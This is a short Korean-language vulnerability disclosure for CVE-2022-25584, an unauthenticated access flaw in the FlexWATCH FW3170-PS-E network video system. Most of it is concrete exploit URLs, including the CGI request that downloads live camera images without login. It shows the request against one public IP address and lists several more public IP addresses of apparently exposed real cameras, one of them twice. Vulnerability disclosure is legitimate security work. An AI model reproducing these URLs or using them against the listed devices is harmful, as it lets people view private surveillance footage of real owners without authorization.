
Flexwatch-CVE
Flexwatch-CVE
이 문서는 CVE-2022-25584 "RESERVED"에 대한 것입니다.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25584

이 취약점은 CNVD에 등록되었지만 아직 공개되지 않았습니다.
CNVD ID:CNVD-2021-103443

취약점 재현:
우리는 Seyeon Tech Co., Ltd.가 소유한 FlexWATCH FW3170-PS-E Network Video System 4.23-3000_GY에서 인증되지 않은 접근 취약점을 발견했습니다. 공격자는 이 취약점을 악용하여 모니터링 이미지를 획득하고 민감한 정보를 유출할 수 있습니다.
예를 들어:
http://211.174.227.102:10001/app/multi/single.asp

그런 다음 방문할 수 있습니다:http://211.174.227.102:10001/cgi-bin/fwcamimgsave.cgi?FwModId=0&PortId=0&FwCgiVer=0x0001
실시간 모니터링 화면 다운로드


회사 공식 웹사이트:http://www.flexwatch.com/
기타 사례:
http://211.240.10.38:10001/app/multi/single.asp
http://121.133.21.35:10001/app/multi/single.asp
http://210.223.145.159:10001/app/multi/single.asp
http://115.142.194.178:10001/app/multi/single.asp
http://115.142.194.178:10001/app/multi/single.asp
http://27.1.124.18:10001/app/multi/single.asp
http://183.100.61.196:10001/app/multi/single.asp
http://118.176.196.247:10001/app/multi/single.asp